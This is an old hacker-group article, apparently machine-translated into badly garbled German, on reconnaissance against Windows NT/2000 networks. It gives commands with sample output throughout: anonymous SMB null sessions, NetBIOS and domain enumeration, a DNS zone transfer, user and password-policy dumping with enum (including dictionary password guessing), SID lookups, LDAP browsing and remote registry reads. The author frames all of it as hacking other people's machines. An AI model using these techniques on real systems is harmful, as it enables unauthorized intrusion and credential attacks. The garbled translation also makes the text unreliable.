Artikel für die Hacker nicht nur

[Security Team LwB - lwb57]:
-------------------------------------------------- -----------------
| 27.08.2004 | geschrieben von Gotius // lwb57 |
| e-mail: gotius [at] Land [dot] ru | Kontakt: www.lwb57.org |
-------------------------------------------------- -----------------
| = --- --- | Inventar Fenster | --- --- = |
-------------------------------------------------- -----------------


Dieser Artikel möchte ich die Langmut Nutzer von Windows zu widmen.
Ich bin nicht einmal hundert Mal das schreckliche Wort über all die Pannen ausspricht
95/98. Ich will nicht sagen, dass nach dem 2000-Problem aufgetreten
XP. Ich will über 2000 zu schreiben, muss ich sagen, dass ich persönlich
Meinung, es amy gut von ihnen zu nehmen Sie alle, aber nicht als Server.
Als Arbeitsplattform ich, glaube ich, schon werde ich
es bis zum Ende der Zeit. Diejenigen, die "mega-cool-hatskery", dass ich
Jetzt schreien, dass es nicht besser als die Knicks. Sofort schicke ich nach / dev / null, weil
Nix Ich erkenne nur eine sehr, sehr ernste Ziele in der ersten
alle Hacking / Sicherheit und so weiter, aber das Dokument-Typ, ich muss
Ich werde nicht klettern. Alle Kommentare zu diesem Konto Bitte senden, auf dem bereits erwähnten
Adresse mich.

Also wende ich mich mehr auf den Punkt, oder eher 2000 / NT. Ich denke, dass kein
Es ist kein Geheimnis, dass die NT krank ist auch das ist
eine Vielzahl von Informationen über jede Anfrage. Diese gefährliche Besetzung
beschäftigt CIFS / SMB-Protokoll (Common Internet File System / Server
Message Block). Diese Protokolle sind leider sind auch wichtig für
Netzwerk-Services, so dass Sie nicht nur auf sie verzichten. Obwohl in
2000 können Sie ganz einfach nutzen TCP / IP ohne NetBIOS, aber
die verbleibenden Bugs noch bleiben.

Nun ich will nicht, dass jemand auf dem Körper suchen gehetzt, was würden
alle uns angelegt. Erinnern wir uns daran, dass die gleiche Microsoft macht
unser Leben einfacher, sondern das gleiche mit ihnen passiert ist NTRK (NT zu lösen
Resource Kit). Natürlich ist dieses Produkt das Thema des ersten
die Notwendigkeit für NT-Administratoren, aber es enthält Dienstprogramme
die sind so nützlich, Cracker (das ist ein Remote-System ist
Management). So Pack für das Jahr 2000 setzt die Tradition der glorreichen.

Ich will nur sagen, dass alles viel effektiver sein wird, wenn wir zu
Zuerst stellen Sie eine "Null-Verbindung" oder "Nullsitzung" (wer
Sie mögen). Das ist ein wunder Punkt CIFS / SMB und NetBIOS.
Zu diesem Zweck wird der Port 139 (standardmäßig geöffnet) geöffnet werden,
Und so, mit Hilfe von Null Verbindung gibt uns die Möglichkeit,
Protokolle verwenden, während wir nicht einmal NIS + authentifizieren.
Wie in früheren Artikeln, wird der erste Ort, den ich offen legen
"Familienvermögen" OS.
Also, eine Verbindung zu öffnen, müssen wir den Befehl eingeben
---
net use \\ 123.45.78.23 \ IPC $ "" / u: ""
---
So schaffen wir einen verdeckten Kanal zwischen Prozessen auf
IPC $ Protokoll, als anonymer Benutzer (/ u: "") und
ein leeres Kennwort ( ""). Wenn alles gut geht, werden wir unser bekommen
Gral, so werden wir in der Lage sein, das Alte, nicht nur über die Netzwerkressourcen zu erhalten,
Benutzer, Gruppen, aber wir können auch Registry-Schlüssel bekommen und
usw. Es gibt noch andere Namen für diese Lücke, aber ...
1. Ich habe einfach nicht erinnern (nicht verpflichtet)
2. Dieser Name wird von allen verstanden, so haben Sie keine Angst, es zu benutzen.
Administratoren sagen, daß von Null-Verbindungen vermieden werden kann,
Verbot solcher Verbindungen in Local Sec. Richtlinieneinstellung (wenn nicht
finden, dann auf der Seife zu schreiben, zeigen an den Fingern). Und zur Freude
Zukunft Hacker sagen, dass sid2user Dienstprogramm, das ich erwähnen
später wird es noch läuft, auch wenn Null-Verbindungen verboten
(Alle Dankschreiben direkt an Bill).

So, jetzt schlage ich ihre Aufmerksamkeit auf all die Freuden zu ziehen
NetBIOS. Ich denke, dass niemand zu erklären muss, was es ist.
Ich wiederhole noch einmal, wenn Sie wollen alles wie am Schnürchen zu sein, so
Null installieren Verbinden und dann alles andere. Und doch, ich
weiter werde ich nicht in realen Daten und echte IP führen, da Ich kann
unter dem Artikel fallen, so wird das alles wenig verändert werden.

Also, um die Namen der Netzwerk-Domänen erhalten, verwenden wir
Team (von kom.str. 2000 / NT) ca. Es ist sehr wichtig für diejenigen
die yuzaet lokalku.
---
net view / Domain wir so etwas wie diese bekommen ...
Domain
----------------------------------
DOMAIN_NAME1
DOMAIN_NAME2
DOMAIN_NAME3
...

Als nächstes können wir alle Computer einer bestimmten Domäne zu sehen
---
Net Ansicht / domain: DOMAIN_NAME2
******************************
Server Name Bemerkung
-----------------------------------
\\ TITO Ich bin hier,
\\ MITO Er ist nicht
\\ LITO Emm ... was bedeutet es
\\ VASYA_PUPKIN Ou! Yo!

Es ist kein Geheimnis, dass, wenn wir sie vor pinged, können wir
verwenden IP stattdessen Server-Namen (zB \\ 124.11.48.15).

Grundsätzlich können wir einen Dump der Tabellenname mit dem Befehl erhalten
nbtstat, Angabe des Parameters A und die definierte IP. Wir bekommen über
folgende
---
C: \ Dokumente und Einstellungen \ ein> nbtstat -A 10.1.5.10

LAN-Verbindung:
Adresse Knoten IP: [10.1.5.10] Area Code: []

Tabelle NetBIOS-Namen von Remote-Computern

Name Typ-Status
-------------------------------------------------- -
INet ~ Dienstleistungen <1C> Gruppe registriert
IS ~ HEXDN ...... <00> UNIQUE Registriert
HEXDN <00> UNIQUE Registriert
HEXDN <03> UNIQUE Registriert
AN <03> UNIQUE Registriert
RFK <00> GROUP Registrierte
RFK <1E> GROUP Registrierte
HEXDN <20> UNIQUE Registriert
RFK <1D> EINDEUTIG Registriert
..__ MSBROWSE __. <01> Gruppe registriert
ADMIN <00> UNIQUE Registriert

Adresskarte (MAC) = 00-01-20-F2-37-7C

So können wir sehen, dass wir hier den Computernamen HEXDN haben,
das gehört zu der Domäne RFK und mehrere Benutzernamen in nashёm
Nur Fall Admin.
Das Recht des Namens von NetBIOS-Dienste haben Codes, kurz, wenn die
<00> Dieser Service ist eine Workstation oder einen Domain-Namen.
<03> Diese Mailing-Dienst auf den Computer übertragen / user
<1D> Haupt-Browser
<1E> prosotra-Service
<20> Dies ist der Server-Dienst
Der Rest ... RTFM

Leider jetzt brauchen wir eine Funktion, die in NTRK enthalten ist,
es nltest. So können wir herausfinden, welche Domänencontroller
sind primäre (PDC), und welcher der sekundäre (BDC) ... wir Zu diesem Zweck
Sie müssen die nltest / DcList eingeben: domain_name2
---
Liste der DCs in Domain domain_name2
\\ TITO (PDC)
\\ MITO
\\ LITO
...

Dann lernen die leckersten ... Ballons eine Nullsitzung mit, und unsere
Befehl net view
C: \ Dokumente und Einstellungen \ eine> net view \\ TITO
Die Anteile an der \\ TITO

Netzwerkname Typ Verwenden Sie einen Kommentar

-------------------------------------------------- ------
D Antriebs
Spiele-Disc
Disc Filme
SAM80 (D) Disc
SCSI (I) Antrieb
Video-Disc
Disc-Filme
Der Befehl wurde erfolgreich abgeschlossen.

ein wenig voraus Laufen zu sagen, dass, wenn wir uns das Recht bekommen
privilegierter Benutzer, können wir verwenden
srvcheck, nicht nur lernen, über Luftballons und autorisierte Benutzer,
sondern auch die verborgenen Ressourcen. Darüber hinaus srvinfo -s ... versuchen Sie es, Sie
wie es ...

Wenn Sie die Befehlszeile nicht verwenden möchten, können Sie
Verwendung Werkzeuge Legion, Nat oder DumpSec. Und so gut
Enum-Dienstprogramm.

Als nächstes wäre schön, stürzen wir uns auf Win 2K.
Wo die erste ich sagen, dass wir müssen nur erhalten
Daten über DNS. Wenn jemand erinnert, wird DNS verwendet
Umwandlung eines solchen netten Namen wie mail.ru in seiner echten IP.
Wenn Sie zurückgehen näher zu unserem Thema, die aktiven Bereichsnamen
Verzeichnis wird auf dem DNS-basiert, aber in Win 2000 DNS just fine
für unsere nächste Aufgabe ...
Ich habe diesen Prozess zuvor beschrieben, so dass ich jetzt nur daran erinnern,
Befehl Nslookup
Und dann
Server nc.dom.net
Ls -d nc.dom.net
-------------------------------------------------- ---
C: \ Dokumente und Einstellungen \ ein> nslookup
Server: ns.dom.net
Adresse: XX.XXX

> Ls -d dom.net
[Ns.dom.net]
dom.net. SOA ns.dom.net root.dom.net. (2003222838 28800 7200 604800 86400)
dom.net. NS ns.dom.net
dom.net. MX 20 dom.nex.com
dom.net. MX 30 ns.dom.net
dom.net. MX 40 gateway.dom.net
dom.net. Ein XX.X.XX.XX
OEM43261 TXT "31b066c632f3c44570893fb11366916a29"

OEM43261 A 10.1.5.32
CD1 A 10.1.5.14
ns A XX.X.XX.XX
ns A 10.1.5.1
ns A 192.168.0.1
Mail CNAME ns.dom.net
FSBP A 10.1.5.55
Benutzer A 10.1.5.236
Benutzer TXT "31347d492f64a86fb88d301a22799a516e"

ns1 CNAME ns.dom.net
klad A 10.1.5.16
epson A 10.1.5.12
Kopierer TXT "313c5b23d4a74d4beb86e5e9999827232b"

www CNAME ns.dom.net
fs1 A 10.1.5.11
OEMCojhtdjt TXT "31a27188d85ff233a56e0a4d2e14713cdf"
-------------------------------------------------- ---
Aufgrund der Spezifität von Win 2K, wird die Aufnahme zu entziffern sein ...
Service.Proto.Name TTL Klasse SRV PROIRITY WEIGHT PORT TARGET

Wir haben auch eine gute Idee, Lager der Nutzer zu nehmen, hier sind wir
verwenden Enum, abtropfen lassen sie aus dem Internet
---
Enum -U -d -P -L -c 120.13.14.56
Server: 120.13.14.56
Einrichten Sitzung ... Erfolg
Kennwort Politik:
Min Länge: keine
...
Sperrungsschwelle: keine
Öffnung lsa Politik: Erfolg
Namen:
netbios: mycom.net
Domain: mycom.net
...
größte Domain:
sysops
PDC: CORP-DC
netlogon von einem PDC-Server durchgeführt
Benutzerliste bekommen (mit 1, Index 0) ... bekam Erfolg 12
Administrator
Puter / Domain
Attribute:
Stis Attribute: ...
Gast (...)
Attribute: deaktiviert
...
...
Sie können sogar erwähnen, dass diese Utila können Sie Ihr Passwort kennen
ein Benutzer zu einem Zeitpunkt ist es notwendig, die angeben,
-D -u -f <Wörterbuch-Datei>

Inbegriffen NTRK mehr Kuchen haben, die uns usrstat helfen wird,
showgrps, lokale und globale. Und es ist auch ein Team dumpsec
Dumpsec /computer=\\157.18.45.83 / rpt = usersonly / saveas = tsv /outfile=C:\haked\fuck.txt
Die Auflistung ist sehr einfach, und Sie können selbst sehen, aber vergessen Sie nicht die
Null-Sitzung !!!

Wir können Konten von Benutzern otindefitsirovat über
user2sid / sid2user. Diese Dienstprogramme ermöglichen es uns, Sicherheits-ID zu bekommen
Benutzer (SID). SID ist ein längenveränderlichen Kennung, die
Es wird vom Benutzer bei der Montage gegeben. Dieses Thema scheint mir
recht umfangreich, so werde ich es nur auf Anfrage heiligen, aber
so ... wenn Sie sich entscheiden, dass Sie es nicht brauchen, werde ich sagen, dass mit Hilfe von
Dienstprogramme können alle Gruppen und alle Benutzer auf der Fernbedienung erhalten
Auto ...

In Win eingeführt 2K einen neuen Pribluda LDAP (Lightweight Directory Access
Protokoll). Das gemeine Volk nennen Namen Active Directory ist. da
Es bietet eine einheitliche logische Sicht auf alle Objekte
Firmennetz. Von dort aus können wir eine Vielzahl von Informationen lernen
Benutzer und Gruppen ... dafür ist das native Tool ldp
(NTRK). Zum Glück für uns, wenn wir geben dieses Utility Controller
Domain Win 2K, zur gleichen Zeit werden wir das Gast Passwort kennen (wenn
ist, die wir unseren Bestand leicht unwahrscheinlich ist), dann verbringen ...
Diese Utila hat eine grafische Benutzeroberfläche, so dass sie nicht bewirkt, dass
Schwierigkeiten. Erste prikonnektimsya (connection-> Connect), Port 389
oder 3268, wenn die andere, müssen Sie angeben, aber im Grunde diese.
Weiter eV (connection-> Bind), wählen Sie dann View-> Baum
und zeigen (wenn Sie zum Beispiel bigdc.ourfirm.org) dc = ourfirm,
dc = org. Und wir werden unsere Informationen zu bekommen, kann ich nicht einen Screenshot führen, so
diese Art es selbst heraus, wird es Fragen sein - schreiben.

Das letzte, was ich will diese beschreiben, wie wir Zugriff auf die Registrierung erhalten. Das
wird wahr sein, wenn der Admin - Trottel und diese Operation nicht verboten hat,
da es wird auf die Null-Punkt-Verbindungen geschlossen.
Zum Beispiel:
---
regdmp -m \\ 195.47.87.89 HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ Currentversion \ Run
-------------------------------------------------- -------
HKEY_LOCAL_MACHINE \ SOFTWARE \ Microsoft \ Windows \ Currentversion \ Run
NVCLOCK = rundll32 nvclock.dll, fnNvclock
Synchronization Manager = mobsync.exe / logon

Fazit:
-----------
Zu meinem großen Bedauern konnte ich diesen Artikel nicht schreiben, wo
Ich konnte einfach alles über die Inventar-Fenster aufzudecken.
Vielmehr konnte ich Artikel über einheimische Okoshnym Meinung
Drogen. Im Prinzip war es mein Ziel, ich meine,
Beschreiben Sie die nativen Tools, aber natürlich wäre es besser, es zu tun
tiefer. Warum ich nicht getan habe, im Prinzip ist die Antwort einfach:
die Grundlagen zu kennen - sehr einfach, ein wenig tiefer zu graben. In der Tat nichts
Komplex gibt es nicht nur die Tasten, die Sie ein etwas anderes gegeben werden
Informationen. Zum Beispiel IP anstelle von Namen. In jedem Fall, wenn der tiefe
Bestands kostengünstig auf Passwörter nicht so wichtig ist, dann
es gibt viele Tools, die glücklich sind, Ihnen das Leben leichter zu machen. Nur nicht
Denken Sie daran, dass eine Menge der Informationen, die sie Ihnen zur Verfügung stellen,
wird hinter den Kulissen bleiben, aber es ist so verdammt nützlich!


PS Wie kann ich die # balsya Inserate ändern, so dass es unmöglich war,
verstehen, die Quelle, aus der sie alle dieselbe empfangen werden.


+ ------------------------------------------------- ---------------- +
| Ñopyright 2002-2004 von LwB Security Team. |
+ ------------------------------------------------- ---------------- +